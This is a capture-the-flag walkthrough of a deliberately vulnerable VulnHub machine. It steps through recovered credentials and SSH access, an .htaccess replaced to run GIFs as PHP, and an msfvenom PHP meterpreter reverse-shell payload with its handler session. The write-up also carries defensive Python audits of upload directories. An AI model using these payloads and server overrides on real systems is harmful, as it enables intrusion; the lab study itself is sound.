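def keyspace(pattern):
    """Number of candidates crunch -t generates; literal chars contribute 1."""
    total = 1
    for ch in pattern:
        total *= CLASS_SIZES.get(ch, 1)
    return total


def wordlist_bytes(pattern):
    """Size of the -o file: every candidate plus a trailing newline."""
    return keyspace(pattern) * (len(pattern) + 1)


def entropy_bits(pattern):
    """Effective entropy of a password drawn uniformly from the pattern."""
    return math.log2(keyspace(pattern))


def blind_keyspace(length, alphabet=95):
    """What an attacker faces with no structure hint: all printable ASCII."""
    return alphabet ** length


def hours_to_exhaust(pattern, guesses_per_second):
    """Worst-case time to walk the whole list at a given guess rate."""
    return keyspace(pattern) / guesses_per_second / 3600


if __name__ == "__main__":
    n = keyspace(PAGE_PATTERN)
    print(f"candidates  : {n:,}  ({wordlist_bytes(PAGE_PATTERN):,} bytes on disk)")
    print(f"entropy     : {entropy_bits(PAGE_PATTERN):.1f} bits")
    print(f"blind 13 ch : {blind_keyspace(13):.3e} candidates, "
          f"{math.log2(blind_keyspace(13)):.1f} bits")
    # assumed rate for illustration only: even a slow CPU dictionary attack
    # clears the structured space in minutes, not the years the policy implies
    print(f"time @200k/s: {hours_to_exhaust(PAGE_PATTERN, 2e5):.2f} hours")
```

The takeaway for a password policy is that length only helps when the structure is unknown: the same 13 characters drop from roughly 85 bits to under 26 bits once a hint sheet spells out which class goes where.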


Extracting the .zip with the password yields us passwords.txt which contains:


Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the """ part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.


Now that we know what the login is for SSH we can pwn this b0x f0 r34l.
 

SSH

The login should be user "bigtommysenior" and pass "fatguyinalittlecoat1938!!".

root@kali:~# ssh -l bigtommysenior 192.168.1.23
bigtommysenior@192.168.1.23's password: 
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

99 packages can be updated.
2 updates are security updates.


Last login: Wed Oct  5 11:06:04 2016 from 192.168.1.25
bigtommysenior@CallahanAutoSrv01:~$ ls -lah
total 44K
drwxr-x--- 4 bigtommysenior bigtommysenior 4.0K Jul  8 08:57 .
drwxr-xr-x 5 root           root           4.0K Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior   13 Oct  5 11:06 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3.7K Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4.0K Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4.0K Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
bigtommysenior@CallahanAutoSrv01:~$ id
uid=1002(bigtommysenior) gid=1002(bigtommysenior) groups=1002bigtommysenior


Yes, we're in baby! And it looks like we have the backup, el flag numero quatro and LOOT!!
Flag 4

YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt


LOOT.ZIP is password-protected and contains THE-END.txt. Let's poke around a bit and restore the .bak file.

bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html


The website is back! Thanks Webguy!

callahanonline

Flag 5 should be in "/" - and it is.

bigtommysenior@CallahanAutoSrv01:/$ ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 .
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Oct  2 17:58 bin
drwxr-xr-x   4 root     root     1.0K Oct  3 06:14 boot
drwxr-xr-x  20 root     root     4.2K Oct  5 06:37 dev
drwxr-xr-x  92 root     root     4.0K Oct  5 11:24 etc
drwxr-xr-x   5 root     root     4.0K Jul  7 00:17 home
lrwxrwxrwx   1 root     root       32 Oct  2 18:00 initrd.img -> boot/initrd.img-4.4.0-38-generic
lrwxrwxrwx   1 root     root       32 Jul 14 13:38 initrd.img.old -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root     root     4.0K Jul  6 11:01 lib
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 lib32
drwxr-xr-x   2 root     root     4.0K Jul  6 08:30 lib64
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 libx32
drwx------   2 root     root      16K Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root     4.0K Jul  6 08:30 media
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 mnt
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 opt
dr-xr-xr-x 200 root     root        0 Oct  5 06:36 proc
drwx------   3 root     root     4.0K Oct  5 06:37 root
drwxr-xr-x  25 root     root      940 Oct  5 11:25 run
drwxr-xr-x   2 root     root      12K Oct  2 17:58 sbin
drwxr-xr-x   2 root     root     4.0K Apr 19 09:31 snap
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 srv
dr-xr-xr-x  13 root     root        0 Oct  5 11:22 sys
drwxrwxrwt   9 root     root     4.0K Oct  5 12:39 tmp
drwxr-xr-x  12 root     root     4.0K Jul  6 11:01 usr
drwxr-xr-x  15 root     root     4.0K Jul 14 13:53 var
lrwxrwxrwx   1 root     root       29 Oct  2 18:00 vmlinuz -> boot/vmlinuz-4.4.0-38-generic
lrwxrwxrwx   1 root     root       29 Jul 14 13:38 vmlinuz.old -> boot/vmlinuz-4.4.0-31-generic


I can't read it, though "www-data" can.

interesting

 

Dropboxin' Part 2 - 73H PWN1N9!!1

So the dropbox works by denying access via .htaccess to any client whose User-Agent does not say iPhone.

BrowserMatchNoCase "iPhone" allowed
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "blablablablabla"


I had already discovered an upload to the system earlier, and during my poking around I found its location on disk at /var/thatsg0nnaleaveamark - owned and operated by "www-data". The fact that the /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads/ dir has got 777 is very nice. But what is supremely naisuru is that it executes GIFs as PHP:

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cat .htaccess 
BrowserMatchNoCase "iPhone" allowed
AddType application/x-httpd-php .gif
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "herpderpderp"
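
Both the User-Agent gate from the Dropboxin' section and the AddType line above are policy decisions written into a single .htaccess, and the 777 directory is what lets a root-owned .htaccess be replaced. As an added example (my code, not the writeup's or the VM author's), the Python below audits such a directory: it parses the .htaccess shown on the page, flags the three weaknesses, and checks that a suggested hardened replacement comes back clean. HARDENED_HTACCESS assumes mod_php and an AllowOverride that permits those directives; the directory mode values are constructed.

```python
"""Audit an Apache upload directory for the three weaknesses seen on Nick's
dropbox: image extensions wired to the PHP handler, access control keyed on
the client-supplied User-Agent, and a world-writable directory whose
root-owned .htaccess any local user can unlink and replace.

Added example, not from the original writeup.  PAGE_HTACCESS is the
.htaccess shown on the page; HARDENED_HTACCESS is a suggested replacement;
the directory modes passed to audit_dir_mode() are constructed values.
"""
import stat

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png"}
UA_DIRECTIVES = {"browsermatch", "browsermatchnocase"}

PAGE_HTACCESS = """\
BrowserMatchNoCase "iPhone" allowed
AddType application/x-httpd-php .gif
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "herpderpderp"
"""

# Suggested replacement for an upload directory (assumes mod_php and an
# AllowOverride that permits these directives): never execute anything here,
# and gate access with real authentication, not a header the client chooses.
HARDENED_HTACCESS = """\
php_flag engine off
RemoveHandler .php .phtml .php3 .gif
RemoveType .php .phtml .php3 .gif
<FilesMatch "\\.(php|phtml|php3|phar)$">
    Require all denied
</FilesMatch>
"""


def audit_htaccess(text):
    """Return a list of findings for the directives in an .htaccess body."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue                      # comments and container tags
        parts = line.split()
        directive, args = parts[0].lower(), parts[1:]
        if directive in ("addtype", "addhandler") and len(args) >= 2:
            handler = args[0].lower()
            exts = {e.lower() for e in args[1:]}
            if "php" in handler:
                hit = sorted(exts & IMAGE_EXTS) or sorted(exts)
                findings.append(f"{parts[0]} {args[0]}: {' '.join(hit)} "
                                "executed as PHP inside an upload directory")
        elif directive in UA_DIRECTIVES or (
                directive == "setenvif" and args and args[0].lower() == "user-agent"):
            findings.append(f"{parts[0]}: access control keyed on the "
                            "client-controlled User-Agent header")
        elif directive == "allow" and [a.lower() for a in args] == ["from", "all"]:
            findings.append("Allow from all: directory open to every client")
    return findings


def audit_dir_mode(mode):
    """Findings for a directory's st_mode (0o40777 is what the page's ls shows)."""
    findings = []
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        findings.append("world-writable without sticky bit: any local user can "
                        "unlink .htaccess or uploads owned by someone else")
    return findings


if __name__ == "__main__":
    for name, text in (("page", PAGE_HTACCESS), ("hardened", HARDENED_HTACCESS)):
        print(f"[{name}]", audit_htaccess(text) or "clean")
    print("[mode 0777]", audit_dir_mode(0o40777))
    print("[mode 0755]", audit_dir_mode(0o40755))
```

The directory check is deliberately separate from the .htaccess check: even a perfect .htaccess is worthless when the directory mode lets any local account delete it, which is exactly the step that follows on this page.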


But my uploaded test pic is on here as well and can only be read like everything else... so can it be deleted?

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 52K
drwxrwxrwx 2 www-data       www-data       4.0K Oct  5 13:15 .
drwxr-xr-x 3 www-data       www-data       4.0K Jul 15 12:47 ..
-rw-r--r-- 1 www-data       www-data        34K Oct  5 10:12 6packsofsoda.jpg
-rw-r--r-- 1 root           root              0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ rm 6packsofsoda.jpg 
rm: remove write-protected regular file '6packsofsoda.jpg'? y
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 16K
drwxrwxrwx 2 www-data       www-data       4.0K Oct  5 13:16 .
drwxr-xr-x 3 www-data       www-data       4.0K Jul 15 12:47 ..
-rw-r--r-- 1 root           root              0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ rm .htaccess 
rm: remove write-protected regular file '.htaccess'? y
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 12K
drwxrwxrwx 2 www-data www-data 4.0K Oct  5 13:17 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 ..
-rw-r--r-- 1 root     root      447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ touch .htaccess
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 12K
drwxrwxrwx 2 www-data www-data             4.0K Oct  5 13:17 .
drwxr-xr-x 3 www-data www-data             4.0K Jul 15 12:47 ..
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root     root                  447 Jul 15 12:32 index.html


Thanks Obama!
notbadobama
I was wondering if I could make this dropbox a bit more public, and since the dir was world-writable I decided to just rm .htaccess and create my own. (The root-owned file could be removed because unlinking needs write permission on the directory, not on the file itself; rm only prompted because the file was write-protected.)

.../uploads$ echo -e 'AddType application/x-httpd-php .php .gif\nAllow from ALL' > .htaccess

Now we have a choice in how we deliver the Pwnage, and choice is everything!
One PHP reverse shell comin' right up! I was actually feeling a bit creative, so I took to making an actual GIF with the PHP code embedded, which will be run when the file is requested from the server.

[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.25 LPORT=4444 -o /root/hacking/TB/sploits/overnyanthousand.gif

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 26800 bytes
Saved as: /root/hacking/TB/overnyanthousand.gif

Tadaa!

overnyanthousand

I upload it to the server and browse to .../P4TCH_4D4MS/uploads/overnyanthousand.gif. Time to tune in with meterpreter.

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.25:4444 
[*] Starting the payload handler...
[*] Meterpreter session 2 opened (192.168.1.25:4444 -> 192.168.1.23:54796) at 2016-10-05 22:26:35 +0200

meterpreter > pwd
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
meterpreter > shell
Process 12104 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /
ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 .
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Oct  2 17:58 bin
drwxr-xr-x   4 root     root     1.0K Oct  3 06:14 boot
drwxr-xr-x  20 root     root     4.2K Oct  5 06:37 dev
drwxr-xr-x  92 root     root     4.0K Oct  5 11:24 etc
drwxr-xr-x   5 root     root     4.0K Jul  7 00:17 home
lrwxrwxrwx   1 root     root       32 Oct  2 18:00 initrd.img -> boot/initrd.img-4.4.0-38-generic
lrwxrwxrwx   1 root     root       32 Jul 14 13:38 initrd.img.old -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root     root     4.0K Jul  6 11:01 lib
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 lib32
drwxr-xr-x   2 root     root     4.0K Jul  6 08:30 lib64
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 libx32
drwx------   2 root     root      16K Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root     4.0K Jul  6 08:30 media
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 mnt
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 opt
dr-xr-xr-x 202 root     root        0 Oct  5 06:36 proc
drwx------   3 root     root     4.0K Oct  5 06:37 root
drwxr-xr-x  25 root     root      940 Oct  5 11:25 run
drwxr-xr-x   2 root     root      12K Oct  2 17:58 sbin
drwxr-xr-x   2 root     root     4.0K Apr 19 09:31 snap
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 srv
dr-xr-xr-x  13 root     root        0 Oct  5 11:22 sys
drwxrwxrwt   9 root     root     4.0K Oct  5 15:09 tmp
drwxr-xr-x  12 root     root     4.0K Jul  6 11:01 usr
drwxr-xr-x  15 root     root     4.0K Jul 14 13:53 var
lrwxrwxrwx   1 root     root       29 Oct  2 18:00 vmlinuz -> boot/vmlinuz-4.4.0-38-generic
lrwxrwxrwx   1 root     root       29 Jul 14 13:38 vmlinuz.old -> boot/vmlinuz-4.4.0-31-generic

With our www-data account privs we can now read the final flag!!

cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

We have all the flags, hacked all necessary things - now we get to extract LOOT.ZIP.
All the flag data:

B34rcl4ws
Z4l1nsky
TinyHead
EditButton
Buttcrack
= B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

Extract THE-END.txt from loot.zip with that password. It reads:

YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security


Conclusion

In this VM we had to restore service to a webpage by restoring a backup. But because everyone was having a bad Monday or something, nobody was available to send me even the simplest creds. So we hacked the company blog to get into the funky FTP server, only to have to hack into an illicit dropbox to find the passwords stored in a secured zip, and then log in over SSH to restore the backup. I stumbled onto a strange .TXT file in / which could only be read by root or "www-data", and found 777 privs on the upload folder of the dodgy dropbox - which btw allowed .GIFs to be executed as code!!1 So I took an awesome GIF, made it more awesomer with a PHP reverse_tcp payload, uploaded it and popped a shell. For the lulz, you know. This may be fun to tinker with, as it covered some basic web design security, and it may inspire me to build a certain lab setup, or to try elevation to root on. I was doing this without any outside help, so I was unable to figure out what the "hi.txt" was for, but my guess would be a discontinued flag.
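The weakness that gave up the last flag was an upload folder that was world-writable and happy to execute a .GIF as PHP. From the defender's side the check you want is the opposite of what I did: walk the upload directory and report anything that is not what its extension claims. The audit below is an added example of mine, not code from the VM or from Brian's setup; the directory layout, file names and file contents it builds are constructed samples, and `audit_upload_dir` / `build_sample_dir` are names I picked.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Signatures for the image types a dropbox like this one would accept. A file
# carrying one of these extensions must begin with the matching magic bytes.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# PHP open tags. An "image" containing one is a polyglot waiting for a
# misconfigured handler to run it.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# Extensions that should never sit in an upload directory at all.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".phar"}


def audit_upload_dir(path):
    """Return a list of (relative_path, reason) findings for an upload directory."""
    root = Path(path)
    findings = []

    # The 777 folder in the write-up: anyone on the box can plant files here.
    if root.stat().st_mode & stat.S_IWOTH:
        findings.append((".", "directory is world-writable"))

    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = str(p.relative_to(root))
        ext = p.suffix.lower()
        data = p.read_bytes()

        if ext in SCRIPT_EXTENSIONS:
            findings.append((rel, "server-side script in upload directory"))
            continue

        magics = IMAGE_MAGIC.get(ext)
        if magics is not None and not data.startswith(magics):
            findings.append((rel, "extension does not match file signature"))

        if PHP_TAG.search(data):
            findings.append((rel, "PHP open tag inside non-script file"))

    return findings


def build_sample_dir():
    """Create a constructed upload folder (assumption: not the VM's real layout)."""
    d = tempfile.mkdtemp(prefix="uploads-audit-")
    os.chmod(d, 0o777)  # mirror the world-writable folder from the write-up
    samples = {
        # a legitimate GIF header followed by harmless filler
        "clean.gif": b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16,
        # a real GIF header with PHP appended: the polyglot pattern
        "poly.gif": b"GIF89a" + b"\x00" * 8 + b'<?php echo "placeholder"; ?>',
        # PHP renamed to .gif with no image header at all
        "fake.gif": b'<?php echo "placeholder"; ?>',
        # a script that should not be in an upload folder
        "shell.php": b'<?php echo "placeholder"; ?>',
        # plain text, nothing suspicious
        "notes.txt": b"brake pad order notes\n",
    }
    for name, content in samples.items():
        Path(d, name).write_bytes(content)
    return d


if __name__ == "__main__":
    for rel, reason in audit_upload_dir(build_sample_dir()):
        print(f"{rel}: {reason}")
```

Run it against a real upload folder by calling `audit_upload_dir("/path/to/uploads")`; every finding is one line of the form `file: reason`. The signature check alone would not have caught the GIF from this box, because it kept a valid header; the open-tag scan is what catches that case, which is why the two checks are kept separate and both run on every file.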

B1g up to Brian Johnson @7MinSec for making this very entertaining and somewhat relatable VM, and to @VulnHub for hosting it. I had a fun time with it!
Find more VMs like this one on VulnHub.